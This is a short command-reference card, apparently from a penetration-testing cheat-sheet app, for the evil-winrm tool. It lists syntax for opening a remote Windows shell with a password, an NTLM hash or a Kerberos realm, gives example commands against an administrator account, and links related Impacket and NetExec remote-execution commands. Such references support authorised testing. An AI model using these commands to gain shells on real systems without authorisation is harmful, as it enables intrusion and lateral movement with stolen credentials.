Evil-WinRM Shell
Windows Remote Management shell connection
- Tool
- evil-winrm
- Category
- Lateral Movement / Remote Shells
- Platform
- linux
- Requires
- password
- Protocols
- WINRM
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
evil-winrm -i '<ip>' -u '<user>' -p '<password>'
Credential variants
The same attack using a different authentication material.
NTLM Hash requires NTLM hash
evil-winrm -i '<ip>' -u '<user>' -H '<hash>'
Kerberos (Realm) requires Kerberos ticket
evil-winrm -i '<ip>' -r '<domain>'
Examples
evil-winrm -i '192.168.1.100' -u 'administrator' -p 'password123'
evil-winrm -i '192.168.1.100' -u 'administrator' -H 'aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42'
Tags
References
Related commands
- Impacket AtExec Execute commands via Windows Task Scheduler service
- Impacket atexec.py (Scheduled Task) One-shot command execution by creating, running, and deleting a scheduled task over…
- Impacket DCOMExec Execute commands via DCOM (Distributed Component Object Model)
- Impacket dcomexec.py Execute commands over DCOM (MMC20.Application / ShellWindows / ShellBrowserWindow)…
- Impacket PSExec Execute commands via PSExec service
- Impacket SMBExec Execute commands via SMB service creation
- Impacket WMIExec Execute commands via WMI (Windows Management Instrumentation)
- NetExec SMB Command Exec Execute commands on a remote Windows host via SMB using NetExec